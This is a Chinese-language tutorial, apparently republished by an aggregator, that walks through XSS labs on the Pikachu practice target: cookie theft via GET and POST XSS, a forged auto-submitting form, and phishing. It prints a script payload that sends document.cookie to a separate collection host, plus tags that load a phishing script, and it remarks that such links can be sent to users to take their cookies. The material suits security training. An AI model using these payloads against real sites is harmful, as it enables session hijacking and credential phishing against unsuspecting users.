Pikachu-xss漏洞之cookie获取钓鱼攻击和xss获取键盘记录

Posted escwq

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Pikachu-xss漏洞之cookie获取钓鱼攻击和xss获取键盘记录相关的知识,希望对你有一定的参考价值。

将进行下图3个实验,更好的来理解xss的危害和原理

技术图片

 

先去修改下Pikachu靶机中的,cookie.php修改成自己的ip

技术图片

 

 实验1:xss如何获取cookie?            

技术图片

 

只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。

登入下

技术图片    技术图片

 

默认没任何数据

技术图片

 

1.1 GET型XSS利用:cookie获取            

先将字符长度的限制给修改掉

技术图片

 

pkxss后台:

http://192.168.43.117/pkxss/pkxss_login.php

现在是没任何数据的

技术图片

 

 在输入框中输入下面语句,输入完后会重定向到Pikachu的首页

<script>document.location = ‘http://192.168.43.117/pkxss/xcookie/cookie.php?cookie=‘ + document.cookie;</script>

技术图片

 

 刷新pkxss后台

技术图片

 

 在实际的场景中我们可以把 红框选中的url发送给用户,一旦他访问啦这个链接,我们便会获得他的cookie值

技术图片

 

上面我们做的GET型XSS的利用,下面我们来演示

1.2 POST型XSS的利用:cookie获取                  

首先我们先来查看下,post(xss)的情况,登入下,用户:admin,密码:123456,,提交参数,并抓包

技术图片

 

我们可以看到它并没有在url里传递参数

技术图片

 

抓包,分析。

通过post方式传到后台的。虽然这里也存在xss,但请求是post方式发送的,我们无法将恶意代码直接嵌到url中发送给目标

技术图片

 

这种情况下应该怎么弄?

攻击者伪造表单自动提交页面

原理图(红框选中部分和上面的get型原理是一样的),

技术图片

 

接下来我们看下让用户访问的,伪造表单自动提交页面(在Pikachu中的pkxss下的xcookie下的post.html

并修改漏洞页面为自己Pikachu靶机的ip,pkxss后台为自己的ip。为了方便也可以,将漏洞页面和pkxss搭建在一台主机上。

修改完后记得先去重启下phpstudy服务(如何用的别的软件,都一样,重启下环境服务就行)

技术图片

 

修改完后,复制到,其他主机站点(www)下。

模拟的恶意站点:

http://192.168.43.118/post.html

当有用户点这个链接时,,就会实现我们的攻击目的。

 

<img src="http://192.168.43.116/pikachu/pkxss/xfish/xfish.php" />

<script src="http://192.168.43.116/pikachu/pkxss/xfish/xfish.php"></script>

 

以上是关于Pikachu-xss漏洞之cookie获取钓鱼攻击和xss获取键盘记录的主要内容,如果未能解决你的问题,请参考以下文章

Pikachu-XSS模块与3个案例演示

Pikachu漏洞练习平台实验——XSS

利用Cookie劫持+HTML注入进行钓鱼攻击

跨站脚本xss

XSS平台的简单搭建和获取cookie

XSS漏洞防御之HttpOnly